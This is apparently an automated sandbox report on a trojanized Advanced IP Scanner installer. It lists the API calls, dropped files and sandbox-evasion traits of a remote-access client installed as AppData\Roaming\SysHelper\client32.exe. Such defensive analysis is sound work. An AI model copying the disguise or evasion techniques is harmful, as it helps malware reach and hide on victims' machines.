                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 7_2_110251B0 SetWindowPos,GetMenu,DrawMenuBar,GetMenu,DeleteMenu,UpdateWindow,IsIconic,SetTimer,KillTimer,7_2_110251B0
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 7_2_111575D0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,7_2_111575D0
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 7_2_111575D0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,7_2_111575D0
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 7_2_11025600 IsIconic,BringWindowToTop,GetCurrentThreadId,7_2_11025600
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 7_2_111579D0 _memset,SendMessageA,SendMessageA,ShowWindow,SendMessageA,IsIconic,IsZoomed,ShowWindow,GetDesktopWindow,TileWindows,7_2_111579D0
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 7_2_110238D0 BringWindowToTop,SetWindowPos,SetWindowPos,SetWindowPos,GetWindowLongA,SetWindowLongA,GetDlgItem,EnableWindow,GetMenu,DeleteMenu,DrawMenuBar,SetWindowPos,IsIconic,UpdateWindow,SetTimer,KillTimer,7_2_110238D0
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 7_2_110BFDD0 IsIconic,ShowWindow,BringWindowToTop,GetCurrentThreadId,7_2_110BFDD0
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 7_2_11023FB0 _memset,_strncpy,_memset,_strncpy,IsWindow,IsIconic,BringWindowToTop,GetCurrentThreadId,7_2_11023FB0
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 7_2_110CA3C0 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,7_2_110CA3C0
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 7_2_110CA3C0 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,7_2_110CA3C0
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 7_2_11110220 IsIconic,GetTickCount,CreateRectRgn,GetClientRect,SetStretchBltMode,CreateRectRgn,GetClipRgn,OffsetRgn,GetRgnBox,SelectClipRgn,StretchBlt,SelectClipRgn,DeleteObject,StretchBlt,StretchBlt,GetWindowOrgEx,StretchBlt,GetKeyState,CreatePen,CreatePen,SelectObject,Polyline,Sleep,SelectObject,Polyline,Sleep,SelectObject,DeleteObject,DeleteObject,BitBlt,7_2_11110220
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 8_2_110251B0 SetWindowPos,GetMenu,DrawMenuBar,GetMenu,DeleteMenu,UpdateWindow,IsIconic,SetTimer,KillTimer,8_2_110251B0
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 8_2_111575D0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,8_2_111575D0
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 8_2_111575D0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,8_2_111575D0
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 8_2_11025600 IsIconic,BringWindowToTop,GetCurrentThreadId,8_2_11025600
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 8_2_111579D0 _memset,SendMessageA,SendMessageA,ShowWindow,SendMessageA,IsIconic,IsZoomed,ShowWindow,GetDesktopWindow,TileWindows,8_2_111579D0
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 8_2_110238D0 BringWindowToTop,SetWindowPos,SetWindowPos,SetWindowPos,GetWindowLongA,SetWindowLongA,GetDlgItem,EnableWindow,GetMenu,DeleteMenu,DrawMenuBar,SetWindowPos,IsIconic,UpdateWindow,SetTimer,KillTimer,8_2_110238D0
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 8_2_110BFDD0 IsIconic,ShowWindow,BringWindowToTop,GetCurrentThreadId,8_2_110BFDD0
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 8_2_11023FB0 _memset,_strncpy,_memset,_strncpy,IsWindow,IsIconic,BringWindowToTop,GetCurrentThreadId,8_2_11023FB0
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 8_2_110CA3C0 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,8_2_110CA3C0
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 8_2_110CA3C0 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,8_2_110CA3C0
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 8_2_11110220 IsIconic,GetTickCount,CreateRectRgn,GetClientRect,SetStretchBltMode,CreateRectRgn,GetClipRgn,OffsetRgn,GetRgnBox,SelectClipRgn,StretchBlt,SelectClipRgn,DeleteObject,StretchBlt,StretchBlt,GetWindowOrgEx,StretchBlt,GetKeyState,CreatePen,CreatePen,SelectObject,Polyline,Sleep,SelectObject,Polyline,Sleep,SelectObject,DeleteObject,DeleteObject,BitBlt,8_2_11110220
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 7_2_11029230 GetTickCount,LoadLibraryA,GetProcAddress,SetLastError,GetProcAddress,GetLastError,_free,GetProcAddress,GetProcAddress,InternetOpenA,SetLastError,SetLastError,SetLastError,_free,GetProcAddress,SetLastError,GetProcAddress,InternetConnectA,GetProcAddress,SetLastError,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetLastError,GetProcAddress,SetLastError,GetLastError,GetDesktopWindow,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,FreeLibrary,7_2_11029230
                                  Source: C:\Users\user\Desktop\Advanced_IP_Scanner_2.5.4594.12.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                                  Malware Analysis System Evasion

                                  barindex
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 7_2_685991F07_2_685991F0
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 7_2_685A4F307_2_685A4F30
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: OpenSCManagerA,EnumServicesStatusA,EnumServicesStatusA,LoadLibraryA,GetProcAddress,OpenServiceA,WideCharToMultiByte,CloseServiceHandle,_memset,_memset,FreeLibrary,CloseServiceHandle,7_2_11127110
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: OpenSCManagerA,EnumServicesStatusA,EnumServicesStatusA,LoadLibraryA,GetProcAddress,OpenServiceA,WideCharToMultiByte,CloseServiceHandle,_memset,_memset,FreeLibrary,CloseServiceHandle,8_2_11127110
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7045Jump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2721Jump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeWindow / User API: threadDelayed 1400Jump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeWindow / User API: threadDelayed 442Jump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeWindow / User API: threadDelayed 6841Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\printsupport\windowsprintersupport.dll (copy)Jump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-8ANUI.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-4D790.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\is-JMQQ6.tmpJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmpDropped PE file which has not been started: C:\Program Files (x86)\Advanced IP Scanner\Qt5Xml.dll (copy)Jump to dropped file
